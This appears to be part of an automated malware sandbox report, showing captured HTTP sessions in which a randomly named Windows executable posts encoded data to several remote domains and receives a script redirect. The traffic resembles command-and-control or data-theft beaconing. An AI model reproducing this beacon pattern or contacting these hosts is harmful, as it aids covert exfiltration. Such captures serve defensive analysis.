                                                                                            Data Ascii: 8RN4oRq=GfkpW16wdgS6jlm9ZeWPBMrYEX3c+EE2dK58iNquE0Mjpl4yHt85kMr+Fg/IYHCPBHjaP5YLOuQuUcHNUm/8u1Bxv1U4jAG8f8ptRawRy2GRDDOs9U5i6Vk9jb1Z1XHpvtRXvzuOp3YIgiDRixECho5dRVaNc90nFHT1jV7RX9vnDxemz5o1stTnb0qsdv0VryCQbubYlMDRyE9THrz0sPMyET4okuiPHA==


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.6499873.33.130.190803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:25.133986950 CET1824OUTPOST /xqh1/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 1248
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.ontohealth.net
                                                                                            Origin: http://www.ontohealth.net
                                                                                            Referer: http://www.ontohealth.net/xqh1/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 47 66 6b 70 57 31 36 77 64 67 53 36 6a 6c 6d 39 5a 65 57 50 42 4d 72 59 45 58 33 63 2b 45 45 32 64 4b 35 38 69 4e 71 75 45 30 45 6a 70 57 77 79 48 4e 41 35 6c 4d 72 2b 4e 41 2f 56 59 48 44 58 42 48 37 6b 50 35 55 39 4f 73 6f 75 62 62 48 4e 64 7a 4c 38 67 31 42 78 74 31 55 31 73 67 47 70 66 38 35 70 52 5a 59 52 79 32 47 52 44 42 36 73 36 46 35 69 31 31 6b 36 71 37 31 46 78 58 47 41 76 74 4a 48 76 7a 71 65 6f 48 34 49 67 43 54 52 78 54 38 43 75 6f 35 66 57 56 61 46 63 39 6f 34 46 48 4f 4f 6a 56 6e 33 58 2b 7a 6e 43 6e 33 77 6e 36 4d 38 79 50 6a 6e 4e 46 33 4b 63 50 46 2b 78 54 47 53 55 38 54 4c 6a 50 71 7a 2b 6b 35 79 50 62 79 56 6d 4f 34 7a 4e 48 64 73 6d 63 33 35 46 6f 43 37 74 56 68 61 4d 75 4b 66 75 50 75 6d 77 65 7a 6c 41 35 4f 58 41 68 6e 59 4e 47 48 36 55 6e 58 39 45 48 33 4e 35 44 42 36 34 2b 64 48 77 57 4c 41 49 75 59 67 4d 37 73 62 4b 32 56 32 53 30 44 65 4f 2b 32 43 76 56 34 34 37 35 65 68 72 55 4a 75 52 46 69 57 6c 73 35 55 46 58 37 69 63 45 4e 45 62 4a 76 4c 68 4d [TRUNCATED]
                                                                                            Data Ascii: 8RN4oRq=GfkpW16wdgS6jlm9ZeWPBMrYEX3c+EE2dK58iNquE0EjpWwyHNA5lMr+NA/VYHDXBH7kP5U9OsoubbHNdzL8g1Bxt1U1sgGpf85pRZYRy2GRDB6s6F5i11k6q71FxXGAvtJHvzqeoH4IgCTRxT8Cuo5fWVaFc9o4FHOOjVn3X+znCn3wn6M8yPjnNF3KcPF+xTGSU8TLjPqz+k5yPbyVmO4zNHdsmc35FoC7tVhaMuKfuPumwezlA5OXAhnYNGH6UnX9EH3N5DB64+dHwWLAIuYgM7sbK2V2S0DeO+2CvV4475ehrUJuRFiWls5UFX7icENEbJvLhMrvOKue1FGWD3MQmSZUfCBsjG+YfoKsa83vrJqVk7D15qqnHzYpUro2kUwxQYvND0yo6mE/nHlGYByu1LDlr5HdMcy98Trp2HyJ7PDCnKVb9SBz25/1Y4fqhpBuH2FSMpEsk9qPpZc8QXNLFc8C18MttZOraX1MRjFnuoaFR7Ydls6qTQNPzlkxeehZ486uXOLWoVJZH92AwgcvyK6RpRH9QS5NzvdDopMXAiCfA1qIXKfnOuaJiQ0RNFT9Pr+tEWq9tcrYiwgtz/nHv61lMkvQlHhhb/seAwZS/5QMdHDJae2OTEHPxcTxnnS5/5Gua0E0iHVKALbz9afRh9VUSB5IU00Z9lypfnwpXPg8QDAFAlWINip/roMnt1yqa4n800bv5/6BtHQ5TL9w7bm3C6FbNMr+mxnkb+E5W4sKCoZy1b+pSWpMGRCk+naH1L4UlZBJYe5yEkzr8XDpTc8fQEFB3Ahe+K6AAE0vpOe81m+f5xquBbk77hXJ/BE31KchUPYtE2h/oYsCWaqIcRLHkvp4/cHpZo2fslLDAqPeLOkx8wM6HCuKa1qdAfNcR3CRhx8UUJcAkF1VWwGAb8yFPmYfHmCHdvpLl0VFaIYAKDIxb2vyeI19BwDBE++uRjPoDZQqWarF9qnB/WC57TX9m78UfVXk9MGnfwKl [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.6499883.33.130.190803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:27.681979895 CET529OUTGET /xqh1/?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU= HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            Host: www.ontohealth.net
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Nov 6, 2024 16:07:28.308826923 CET417INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Wed, 06 Nov 2024 15:07:28 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 277
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 42 56 38 54 3d 31 6c 4a 70 5a 66 62 58 41 34 4b 26 38 52 4e 34 6f 52 71 3d 4c 64 4d 4a 56 41 65 38 4c 6a 43 4a 74 41 2f 68 58 2f 57 47 4a 62 76 31 45 47 53 38 78 57 63 65 46 4a 74 37 6a 37 53 69 45 44 67 43 68 6d 45 55 42 4c 63 34 69 64 4f 79 4b 43 72 38 64 46 6d 75 4b 41 79 31 4d 76 41 78 61 2b 6b 36 63 71 72 31 58 7a 4b 67 6c 6b 42 79 71 6e 73 34 30 56 36 63 58 65 42 51 66 61 51 51 31 30 36 31 63 6a 79 6b 79 33 34 58 33 79 59 6f 75 6f 59 44 34 33 66 5a 77 65 46 2b 74 45 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU="}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.649989192.197.113.67803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:34.931627035 CET772OUTPOST /3tnk/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 212
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.c6ytv.net
                                                                                            Origin: http://www.c6ytv.net
                                                                                            Referer: http://www.c6ytv.net/3tnk/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 50 55 65 70 6e 48 6c 79 39 2f 4f 69 4b 35 41 36 35 78 6c 2f 6d 41 6b 51 67 54 73 76 76 39 4d 4a 57 34 63 59 71 65 64 66 76 2f 45 61 4f 44 45 46 35 6e 46 71 55 6d 78 2f 46 67 7a 33 6b 4f 58 6b 6f 75 4c 6e 74 72 43 48 47 63 68 6b 50 46 73 59 6d 73 70 75 50 4b 70 43 6f 69 70 6d 6a 70 41 4a 52 69 6e 56 6e 66 67 39 52 2b 71 71 66 6c 4e 69 54 55 79 69 50 44 4c 31 61 39 38 62 73 51 64 74 51 4d 5a 56 52 33 4a 49 6a 51 61 33 7a 76 74 46 57 63 76 57 63 53 79 7a 71 50 48 6d 62 50 47 34 5a 68 4d 49 39 43 4d 58 77 6a 76 4d 34 71 6a 42 52 4d 43 75 69 78 4a 63 6e 7a 4a 71 73 4d 2f 6d 2b 79 4a 37 46 2b 51 30 66 39 4f 7a
                                                                                            Data Ascii: 8RN4oRq=PUepnHly9/OiK5A65xl/mAkQgTsvv9MJW4cYqedfv/EaODEF5nFqUmx/Fgz3kOXkouLntrCHGchkPFsYmspuPKpCoipmjpAJRinVnfg9R+qqflNiTUyiPDL1a98bsQdtQMZVR3JIjQa3zvtFWcvWcSyzqPHmbPG4ZhMI9CMXwjvM4qjBRMCuixJcnzJqsM/m+yJ7F+Q0f9Oz
                                                                                            Nov 6, 2024 16:07:35.910486937 CET246INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Wed, 06 Nov 2024 15:07:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.649990192.197.113.67803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:37.477932930 CET796OUTPOST /3tnk/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 236
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.c6ytv.net
                                                                                            Origin: http://www.c6ytv.net
                                                                                            Referer: http://www.c6ytv.net/3tnk/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 50 55 65 70 6e 48 6c 79 39 2f 4f 69 4c 64 38 36 2f 67 6c 2f 71 77 6b 54 76 7a 73 76 6d 64 4d 4e 57 34 67 59 71 66 5a 50 73 4e 51 61 50 6d 67 46 34 6c 68 71 56 6d 78 2f 50 41 7a 75 75 75 58 7a 6f 75 57 59 74 72 2b 48 47 66 64 6b 50 41 49 59 6c 66 42 70 4f 61 70 41 75 69 70 67 6e 70 41 4a 52 69 6e 56 6e 66 6b 48 52 2b 69 71 66 55 39 69 56 32 61 68 4d 44 4c 30 64 39 38 62 6f 51 64 70 51 4d 5a 33 52 32 55 74 6a 53 53 33 7a 71 70 46 57 49 7a 56 57 53 79 31 33 66 47 54 62 76 72 64 59 77 4a 48 2f 6a 6c 76 7a 68 4f 73 35 63 69 62 4e 2f 43 4e 77 68 70 65 6e 78 52 59 73 73 2f 4d 38 79 78 37 58 70 63 54 51 4a 72 51 5a 53 6d 4c 46 74 38 37 38 5a 74 59 67 61 77 70 39 41 6f 32 75 51 3d 3d
                                                                                            Data Ascii: 8RN4oRq=PUepnHly9/OiLd86/gl/qwkTvzsvmdMNW4gYqfZPsNQaPmgF4lhqVmx/PAzuuuXzouWYtr+HGfdkPAIYlfBpOapAuipgnpAJRinVnfkHR+iqfU9iV2ahMDL0d98boQdpQMZ3R2UtjSS3zqpFWIzVWSy13fGTbvrdYwJH/jlvzhOs5cibN/CNwhpenxRYss/M8yx7XpcTQJrQZSmLFt878ZtYgawp9Ao2uQ==
                                                                                            Nov 6, 2024 16:07:38.509207964 CET246INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Wed, 06 Nov 2024 15:07:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.649991192.197.113.67803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:40.030045986 CET1809OUTPOST /3tnk/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 1248
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.c6ytv.net
                                                                                            Origin: http://www.c6ytv.net
                                                                                            Referer: http://www.c6ytv.net/3tnk/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 50 55 65 70 6e 48 6c 79 39 2f 4f 69 4c 64 38 36 2f 67 6c 2f 71 77 6b 54 76 7a 73 76 6d 64 4d 4e 57 34 67 59 71 66 5a 50 73 4e 49 61 4f 51 38 46 34 46 64 71 57 6d 78 2f 44 67 7a 72 75 75 58 75 6f 75 65 63 74 72 79 78 47 5a 5a 6b 4f 69 41 59 67 75 42 70 58 4b 70 41 73 69 70 68 6a 70 42 4e 52 69 33 5a 6e 66 55 48 52 2b 69 71 66 57 6c 69 57 6b 79 68 4b 44 4c 31 61 39 38 48 73 51 64 52 51 4d 51 49 52 32 67 58 69 69 79 33 79 4b 35 46 55 37 62 56 65 53 79 33 30 66 47 4c 62 76 6e 4f 59 77 46 74 2f 6a 67 6e 7a 69 53 73 34 61 54 73 53 62 47 4d 74 43 74 5a 37 47 6f 79 31 5a 53 6e 31 78 78 77 47 59 6b 77 50 37 6a 4a 64 79 75 53 42 65 64 61 72 59 5a 68 72 64 64 66 77 79 4a 78 39 6b 37 4b 41 77 61 6d 76 31 50 49 4a 55 4b 76 64 36 57 79 68 59 78 33 69 32 75 45 64 6c 77 55 6b 2f 4b 5a 78 6c 79 37 57 79 30 4f 4a 79 59 58 68 6b 61 2f 34 56 39 70 54 63 69 49 6d 49 6c 49 64 79 48 51 74 79 64 2b 67 33 37 4f 43 42 4b 38 38 73 33 54 56 33 2f 62 4c 64 77 35 66 42 61 43 6d 36 46 51 67 51 61 67 50 38 [TRUNCATED]
                                                                                            Data Ascii: 8RN4oRq=PUepnHly9/OiLd86/gl/qwkTvzsvmdMNW4gYqfZPsNIaOQ8F4FdqWmx/DgzruuXuouectryxGZZkOiAYguBpXKpAsiphjpBNRi3ZnfUHR+iqfWliWkyhKDL1a98HsQdRQMQIR2gXiiy3yK5FU7bVeSy30fGLbvnOYwFt/jgnziSs4aTsSbGMtCtZ7Goy1ZSn1xxwGYkwP7jJdyuSBedarYZhrddfwyJx9k7KAwamv1PIJUKvd6WyhYx3i2uEdlwUk/KZxly7Wy0OJyYXhka/4V9pTciImIlIdyHQtyd+g37OCBK88s3TV3/bLdw5fBaCm6FQgQagP8/0Mw/gvtl9M5q7aMS6smnahykOEx5FkUfbSVM0ALn9zaxJ2NcI8fmhovWDRukDuQ2ZO6EhPiviwrNN7AAUEiMuitePxBlgVIOC7y/RkY9ZNChGX6GxQtbAFU09fly1tRY/9+dAw/UkMSNfi/QoQ/ATx3Ovjlr4aUaqkPr02AvdFo1vumV7hkVvf3MHvVuQQMU+NOseSJSy00o50q14Y8vRCtSVOmOhCDlgixWxcQB/CljstTqMGTVNJ2+0TXAfDdWylAt2h5yUIg5Ccck0y07EyZpuQqnnX3j/FfAzf9pekdXjZAAJGAcq9nqg6WEbpeiMxFfmSOoFj6AtsihmlFbBHkJ79u/FHtJ5tM2vf0CGbfrwQU5cHup+nhQ0s2l/22hjNrH9gLsbDvDQ9Clmaz5SlTNYMn5tGIlM10klHyG7kJrB7uuiOCoG7HzSrZ16BQLMxI+yyaq5S1mrshdMPDDudY++/xk2tbSjCmNbq/Zud51qRJskyA1MhpX3KWLCTHdkoVTwyUItAydVSLIAzP//ZQUPhenjwahHnUw0PYvgDr89NBmRr72noDi+jtfoI+SfYysOd7hiPOK4PLiwuXSTYH02WeLe6qhab/ZuyyBcmvzBlr5hQapq6ozzLdAp8S3uo3/l4/R1fy8sVdCtU00x14WzAnglGNMx [TRUNCATED]
                                                                                            Nov 6, 2024 16:07:41.202744007 CET246INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Wed, 06 Nov 2024 15:07:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.649992192.197.113.67803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:42.567240000 CET524OUTGET /3tnk/?8RN4oRq=CW2JkxV3pcekLoIorT56ryscgS11ntIpF5Aeg7ZfnKRiExYc+D8BbmUzHwDhufn4r4Dro/61FctGFi0noZVWC4EErF1Fy7sjRinEodY+GdyVC1Z8TkDJNhe4fZdCuwZwItNyPB0=&SBV8T=1lJpZfbXA4K HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            Host: www.c6ytv.net
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Nov 6, 2024 16:07:43.562258005 CET246INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Wed, 06 Nov 2024 15:07:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/7.4.33
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.649994162.0.225.218803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:48.976064920 CET775OUTPOST /f8et/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 212
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.sadey.info
                                                                                            Origin: http://www.sadey.info
                                                                                            Referer: http://www.sadey.info/f8et/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 61 65 57 76 65 37 75 71 2f 49 48 74 41 4f 61 69 70 36 55 52 77 70 35 35 74 4a 34 53 4a 32 31 75 2b 2f 53 77 35 38 46 6f 46 6e 47 65 5a 50 71 4c 74 32 72 36 75 6d 5a 72 32 35 75 4d 75 6d 35 66 71 76 6d 44 45 73 72 56 72 6b 71 2b 79 47 52 46 2f 57 72 4b 59 4f 57 57 45 50 4b 68 67 65 5a 46 58 6b 30 76 2b 2b 6c 56 48 64 4f 41 58 7a 43 34 64 79 76 59 5a 6d 42 32 38 74 4d 36 39 74 59 5a 45 45 77 69 73 55 6d 57 49 4a 68 56 71 49 77 6c 65 51 58 50 64 70 72 58 53 54 43 58 79 47 33 79 5a 55 77 47 78 78 6b 75 6e 34 6d 34 51 55 44 37 31 42 71 6b 64 77 55 75 6c 44 4c 4d 6a 34 72 53 6d 6b 4b 76 57 30 54 62 31 43 54 43
                                                                                            Data Ascii: 8RN4oRq=aeWve7uq/IHtAOaip6URwp55tJ4SJ21u+/Sw58FoFnGeZPqLt2r6umZr25uMum5fqvmDEsrVrkq+yGRF/WrKYOWWEPKhgeZFXk0v++lVHdOAXzC4dyvYZmB28tM69tYZEEwisUmWIJhVqIwleQXPdprXSTCXyG3yZUwGxxkun4m4QUD71BqkdwUulDLMj4rSmkKvW0Tb1CTC
                                                                                            Nov 6, 2024 16:07:49.640774012 CET533INHTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:49 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.649995162.0.225.218803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:51.534784079 CET799OUTPOST /f8et/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 236
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.sadey.info
                                                                                            Origin: http://www.sadey.info
                                                                                            Referer: http://www.sadey.info/f8et/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 61 65 57 76 65 37 75 71 2f 49 48 74 42 76 71 69 35 74 49 52 31 4a 35 36 6f 4a 34 53 62 32 31 79 2b 2f 65 77 35 34 38 6c 45 56 69 65 59 76 36 4c 75 30 54 36 76 6d 5a 72 39 5a 75 4a 68 47 35 45 71 6f 76 6a 45 70 54 56 72 6b 2b 2b 79 44 74 46 2f 6e 72 4a 59 65 57 55 64 66 4b 6a 6b 65 5a 46 58 6b 30 76 2b 2f 42 7a 48 63 71 41 57 44 79 34 61 6a 76 62 46 32 42 31 73 4e 4d 36 35 74 59 64 45 45 77 55 73 57 53 77 49 4c 70 56 71 4a 41 6c 64 44 50 4f 58 70 72 64 4d 54 44 36 6a 56 4f 56 66 69 6c 71 2f 48 74 57 7a 71 65 59 59 43 43 68 70 79 71 48 50 67 30 73 6c 42 54 2b 6a 59 72 34 6b 6b 79 76 45 6a 66 38 36 32 32 68 30 4d 71 43 4d 57 30 49 48 68 7a 2f 6b 59 4f 46 75 67 6a 65 43 41 3d 3d
                                                                                            Data Ascii: 8RN4oRq=aeWve7uq/IHtBvqi5tIR1J56oJ4Sb21y+/ew548lEVieYv6Lu0T6vmZr9ZuJhG5EqovjEpTVrk++yDtF/nrJYeWUdfKjkeZFXk0v+/BzHcqAWDy4ajvbF2B1sNM65tYdEEwUsWSwILpVqJAldDPOXprdMTD6jVOVfilq/HtWzqeYYCChpyqHPg0slBT+jYr4kkyvEjf8622h0MqCMW0IHhz/kYOFugjeCA==
                                                                                            Nov 6, 2024 16:07:52.223860025 CET533INHTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:52 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html
